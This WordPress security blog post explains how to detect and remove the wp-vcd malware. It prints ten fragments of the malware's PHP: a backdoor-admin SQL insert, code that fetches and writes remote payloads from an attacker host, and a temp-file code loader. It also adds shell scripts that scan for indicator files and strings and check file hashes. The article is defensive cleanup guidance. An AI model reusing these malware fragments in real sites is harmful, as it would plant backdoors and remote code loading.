Last Updated: 24th July, 2022
A few days back, our own website suffered this wp-vcd.php malware attack, all of a sudden. We immediately took steps to resolve the issue. We consulted our hosting provider and then secured our website against the wp-vcd.php malware with the help of the free versions of the Wordfence Security – Firewall & Malware Scan plugin and the Anti-Malware Security and Brute-Force Firewall plugin, and imposed some further security measures.
Therefore, please don’t implement, change or delete any files without reading the full article. We ask that you NOT install every security plugin unless you know what you are doing. Finally, remember to always take a backup before you do anything. Let’s now concentrate on our “How To Secure wp-vcd.php Malware Attack In WordPress Websites And Stay Protected” guide.
Table of Contents:-
- 1: What Is WordPress wp-vcd Malware and wp-vcd Malware Hack?
- 2: The top reasons that are responsible for the wp-vcd Malware Hack.
- 3: What are the Signs and Symptoms of wp-vcd Malware?
- 4: Scrutinizing of what the wp-vcd Malware does?
- 5: How to clean up the wp-vcd Malware Infection?
- 6: How to secure WordPress and stay protected from the Backdoor Hack?
- 7: Conclusion and VILab India Ultimate WordPress Security Guide
1: What Is WordPress wp-vcd Malware and wp-vcd Malware Hack?
Recently, we observed a new kind of malware infecting WordPress websites by exploiting flaws in outdated themes and plugins. The wp-vcd malware creates backdoor access to your website by adding hidden WordPress administrator users. Further, some variants of the malicious code have been seen to alter WordPress core files and to add new files to the installation's /wp-includes directory.
- The wp-vcd malware creates spam URLs on the website (also referred to as URL injection).
- The malware creates a backdoor entry point which lets attackers access your website over a long period.
- Hackers exploit vulnerabilities in WordPress themes and plugins to upload the wp-vcd malware to exposed websites.
Such a hack can be avoided by keeping up strategic monitoring with a Web Application Firewall (WAF), such as Sucuri SiteCheck, and regular malware scanning. It is also essential to check for any modification of WordPress core files, themes and plugins.
2: The top reasons that are responsible for the wp-vcd Malware Hack.
- The most widely recognized cause of the hack is the use of a nulled theme: the wp-vcd malware usually comes pre-bundled with themes downloaded from nulled-theme websites.
- You are still using outdated WordPress themes and plugins on your website.
- No Web Application Firewall (WAF) is installed to block hacking attempts.
3: What are the Signs and Symptoms of wp-vcd Malware?
- A completely new WordPress admin user has appeared out of the blue.
- Your hosting provider may have suspended your WordPress hosting account because of the wp-vcd malware attack, to protect the other websites on the same server.
- SEO spam, for example Japanese search results or a Pharma Hack in Google search results, is another very common sign and symptom. Learn about WordPress spam in search results and how to secure against it. The following is the screen capture of Google spam indexed results:
- Unknown JavaScript code in the source of your website.
- Pages of your website are being redirected to obscure and shady websites.
- Unknown PHP files in your installation's wp-includes folder which are not found in the WordPress GitHub repository.
- PHP files in your installation's wp-content/uploads directory and its sub-directories.
4: Scrutinizing of what the wp-vcd Malware does?
Within your theme (whatever theme you are using), in the functions.php file, you might observe code like this:
<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>
This code includes the class.theme-modules.php file, which in turn installs the wp-vcd malware into the other themes already installed (regardless of whether they are enabled or disabled) and creates the various malicious files.
Below are the different code-snippet patterns of the malware's suspicious code:
Pattern 1
<?php //install_code1 error_reporting(0); ini_set('display_errors', 0); DEFINE('MAX_LEVEL', 2); DEFINE('MAX_ITERATION', 50); DEFINE('P', $_SERVER['DOCUMENT_ROOT']); $GLOBALS['WP_CD_CODE'] = 'PD9waHANCmVycm9y...(base64-encoded string of PHP code) ...; ?>
Pattern 2
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
} ; ?>
Pattern 3
$install_code = 'c18615a1ef0e1cd813b388b4b6e29bcdc18615a1ef0e1cd813b388b4b6e29bcd[...Blah blah blah..]
$install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
$install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));
Pattern 4
if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')){
if (strpos($content, 'WP_V_CD') === false){
$content = $install_code . $content ;
@file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content);
touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time );
}
else { $ping = false; }
}
Pattern 5
if ($ping) { $content = @file_get_contents('http://www.spekt[dot]cc/test[dot]php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash); @file_put_contents(ABSPATH . '/wp-includes/class.wp.php', file_get_contents('http://www.spekt[dot]cc/admin[dot]txt')); }
if ($ping2) { $content = @file_get_contents('http://www.spekt[dot]cc/test[dot]php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash); @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.spekt[dot]cc/admin[dot]txt')); //echo ABSPATH . 'wp-includes/class.wp.php'; }
Pattern 6
$wpdb->query("INSERT INTO $wpdb->users (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES ('100011111', '100011111', '\$P\$c18615a1ef0e1cd813b388b4B6e29bcd.', '100011111', '[email protected]', '', '2010-06-07 00:00:00', '', '0', '100010010')");
Pattern 7
if( isset($_GET['key']) ) { $options = get_option( EWPT_PLUGIN_SLUG ); echo '
' . esc_attr( $options['user_name'] . ':' . esc_attr( $options['api_key'])) . '
'; echo esc_html( envato_market()->get_option( 'token' ) ); echo '
'; } }
Pattern 8
function wp_temp_setupx($phpCode)
{
$tmpfname = tempnam(sys_get_temp_dir(), "wp_temp_setupx");
$handle = fopen($tmpfname, "w+");
fwrite($handle, "<?php\n" . $phpCode);
fclose($handle);
include $tmpfname; unlink($tmpfname);
return get_defined_vars();
}
Pattern 9
foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
[...]
$post_content = preg_replace('!<div id="'.$div_code_name.'">(.*?)</div>!s', '', $data -> post_content);
[...]
$file = preg_replace('/'.$matcholddiv[1][0].'/i',$_REQUEST['newdiv'], $file);
[...]
$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
if ($wpdb -> query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/'.mysql_escape_string($_REQUEST['url']).'", `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string($_REQUEST['content']).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'"'))
Pattern 10
if ( ! function_exists( 'wp_temp_setup' ) ) {
$path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];
if($tmpcontent = @file_get_contents("http://www.spekt[dot]cc/codeX[dot]php?i=".$path))
There may be more patterns, but we need to understand them minutely and perfectly before we act on them.
As analyzed in the previous section, this code creates a new administrator user with a name like 100010010. The goal of this backdoor administrator account is to ensure that the hacker can get into the website even after you delete the malicious code, so the attackers can attack your website again at a later point in time.
5: How to clean up the wp-vcd Malware Infection?
Scan for occurrences of the files and strings below on your server and inspect their contents. Make sure to run a diff check of the file contents against the corresponding files in the WordPress core GitHub repository (https://github.com/WordPress/WordPress) or the plugin / theme directory. You can use either of the approaches below (or both), via SSH (Secure Shell) or your IDE (Integrated Development Environment).
5.1: Strategy 1 – Scan for files on the server that are typically infected by the wp-vcd hack:
- wp-includes/wp-vcd.php
- wp-includes/wp-tmp.php
- wp-content/themes/*/functions.php (each and every theme installed on the server, regardless of whether it is active or not)
- class.theme-modules.php
- class.wp.php
- admin.txt
- codexc.txt
- code1.php
- cookie.txt
- class.theme-modules.php (inside your theme folder)
- codeX.php
- test.php
5.2: Strategy 2 – Scan for string patterns that are found in infected files:
- $install_code
- tmpcontentx
- function wp_temp_setupx
- wp-tmp.php
- derna.top/code.php
- stripos($tmpcontent, $wp_auth_key)
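Both strategies above, plus the section 3 symptom of PHP files under wp-content/uploads, can be run from one SSH session with a short script. The script below is an added example, not code from the article or from any plugin it mentions: it builds a small constructed sample WordPress tree so it runs offline, and the function names (wpvcd_findings, wpvcd_make_sample) are my own. It searches the whole install for the file names in Strategy 1, greps every theme's functions.php and every PHP file under wp-includes for the Strategy 2 strings (plus the WP_V_CD marker the installer checks for in Pattern 4), and lists any PHP file under uploads. A hit on a generic name such as test.php is only a lead; diff the file against the upstream copy before deleting anything.

```shell
#!/bin/sh
# Added example (not from the article): scan a WordPress tree for the
# wp-vcd indicators listed in Strategy 1 and Strategy 2.
# Usage: wpvcd_findings /path/to/wordpress   -> one finding per line

# File names the article lists as typical wp-vcd drop locations.
WPVCD_FILES="wp-vcd.php wp-tmp.php class.theme-modules.php class.wp.php admin.txt codexc.txt code1.php cookie.txt codeX.php test.php"
# Strings the article lists as found in infected files (ERE syntax), plus the
# WP_V_CD marker the installer looks for before prepending itself (Pattern 4).
WPVCD_STRINGS='install_code|tmpcontentx|wp_temp_setupx|wp-tmp\.php|derna\.top/code\.php|stripos\(\$tmpcontent, \$wp_auth_key\)|WP_V_CD'

wpvcd_findings() {
    root=$1
    # 1. Known file names anywhere in the tree (class.theme-modules.php is
    #    dropped inside theme folders, so the whole install is searched).
    for name in $WPVCD_FILES; do
        find "$root" -type f -name "$name" 2>/dev/null | sed 's/^/suspicious file: /'
    done
    # 2. Known strings in every theme's functions.php (active or not) and in
    #    every PHP file under wp-includes.
    { find "$root/wp-content/themes" -type f -name functions.php 2>/dev/null
      find "$root/wp-includes" -type f -name '*.php' 2>/dev/null; } |
    while IFS= read -r f; do
        grep -Eq "$WPVCD_STRINGS" "$f" && echo "suspicious string in: $f"
    done || true
    # 3. PHP files under uploads: WordPress itself never writes PHP there.
    find "$root/wp-content/uploads" -type f -name '*.php' 2>/dev/null | sed 's/^/php in uploads: /'
}

wpvcd_make_sample() {
    # Constructed sample install (not a real site): one clean theme, one nulled
    # theme carrying the installer marker, a dropped wp-includes file and a
    # stray PHP file under uploads.
    d=$(mktemp -d)
    mkdir -p "$d/wp-includes" "$d/wp-content/themes/clean" \
             "$d/wp-content/themes/nulled" "$d/wp-content/uploads/2022/07"
    printf '<?php\nadd_action("init", "clean_theme_setup");\n' > "$d/wp-content/themes/clean/functions.php"
    printf '<?php\n//install_code1\n$install_code = "...";\n' > "$d/wp-content/themes/nulled/functions.php"
    printf '<?php\n// stand-in for the installer class\n' > "$d/wp-content/themes/nulled/class.theme-modules.php"
    printf '<?php\nif (!file_exists(ABSPATH . "wp-includes/wp-tmp.php")) {}\n' > "$d/wp-includes/wp-vcd.php"
    printf '<?php\necho "not an image";\n' > "$d/wp-content/uploads/2022/07/image.php"
    echo "$d"
}

# Stand-alone demo on the constructed sample tree.
sample=$(wpvcd_make_sample)
wpvcd_findings "$sample"
rm -rf "$sample"
```

On the sample tree the scan reports five lines: two file-name hits (wp-includes/wp-vcd.php and the theme's class.theme-modules.php), two string hits (the nulled theme's functions.php and the dropped wp-vcd.php, which mentions wp-tmp.php) and the PHP file under uploads; the clean theme is not reported. Run it against a real install as the web user with the document root as the argument.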
6: How to secure WordPress and stay protected from the Backdoor Hack?
- Create a simple yet bold security strategy for your WordPress website:
  - Clean – Diligently make sure that your website files and database are 100% clean and malware-free.
  - Secure – Install a good Web Application Firewall (WAF) like the Wordfence Security – Firewall & Malware Scan plugin to block any kind of re-infection attempt.
  - Monitor – Run regular malware scans to check whether any files or database tables have been altered.
- Delete any unused WordPress themes (even if they are disabled).
- Totally avoid nulled themes and plugins on your website.
- Regularly and religiously update the WordPress core files, plugins and themes.
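The Monitor step (checking whether files have been altered) can be done with a hash baseline even without a plugin. The script below is an added example, not code from the article or from Wordfence; it assumes GNU coreutils sha256sum is installed, and the function names (wpvcd_baseline, wpvcd_verify, wpvcd_sample_site, wpvcd_tamper_sample) are my own. Take the baseline right after the site is confirmed clean, keep it somewhere the web server cannot write, and re-run the verify step on a schedule; every reported line is a file to diff against the upstream copy.

```shell
#!/bin/sh
# Added example (not from the article): a minimal file-integrity baseline for
# the "Monitor" step. wpvcd_baseline writes "<sha256>  ./path" for every PHP
# file under the root; wpvcd_verify re-hashes and prints what was added,
# modified or removed since the baseline. Assumes GNU sha256sum.

wpvcd_baseline() {   # $1 = WordPress root, $2 = baseline file to write
    ( cd "$1" && find . -type f -name '*.php' | LC_ALL=C sort |
      while IFS= read -r f; do sha256sum "$f"; done ) > "$2"
}

wpvcd_verify() {     # $1 = WordPress root, $2 = baseline file; one change per line
    current=$(mktemp)
    wpvcd_baseline "$1" "$current"
    # Key both listings by path: only in baseline = removed, only in current
    # = added, in both with a different hash = modified.
    awk 'FILENAME == ARGV[1] { base[$2] = $1; next }
         { cur[$2] = $1 }
         END {
             for (p in base) if (!(p in cur)) print "removed: " p
             for (p in cur)  if (!(p in base)) print "added: " p
                             else if (cur[p] != base[p]) print "modified: " p
         }' "$2" "$current" | LC_ALL=C sort
    rm -f "$current"
}

wpvcd_sample_site() {
    # Constructed sample (not a real site): two theme files and one core file.
    d=$(mktemp -d)
    mkdir -p "$d/wp-content/themes/shop" "$d/wp-includes"
    printf '<?php\nadd_action("init", "shop_setup");\n' > "$d/wp-content/themes/shop/functions.php"
    printf '<?php\n// theme helper\n' > "$d/wp-content/themes/shop/helpers.php"
    printf '<?php\n// core file\n' > "$d/wp-includes/formatting.php"
    echo "$d"
}

wpvcd_tamper_sample() {   # $1 = root: change, add and remove one file each
    printf '//install_code1\n' >> "$1/wp-content/themes/shop/functions.php"
    printf '<?php\n// dropped file\n' > "$1/wp-includes/class.wp.php"
    rm -f "$1/wp-content/themes/shop/helpers.php"
}

# Stand-alone demo: baseline a clean tree, change it, report the differences.
site=$(wpvcd_sample_site)
baseline=$(mktemp)
wpvcd_baseline "$site" "$baseline"
wpvcd_tamper_sample "$site"
wpvcd_verify "$site" "$baseline"
rm -rf "$site" "$baseline"
```

On the sample the verify step prints three lines, one each for the added wp-includes/class.wp.php, the modified theme functions.php and the removed helpers.php; on an untouched tree it prints nothing. Restrict the baseline to PHP files as here, or extend the find pattern to .htaccess and .js files if you want those covered too.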
7: Conclusion and VILab India Ultimate WordPress Security Guide
Disinfecting websites infected with such malware isn’t always simple, since once activated on a website it tends to infect other sections of the website as well by implanting different kinds of malicious code.
Moreover, this specific malware also creates backdoor access which lets the bad actors control your website. Consequently, it is vital to build an effective security strategy which performs an exhaustive analysis of your website and afterwards completely removes the hack. We strongly recommend that you follow our Ultimate WordPress Security Guide, where you can find 25+ tips and resolutions to stay secure online.
Don’t be selfish: share this with all your WordPress-using friends.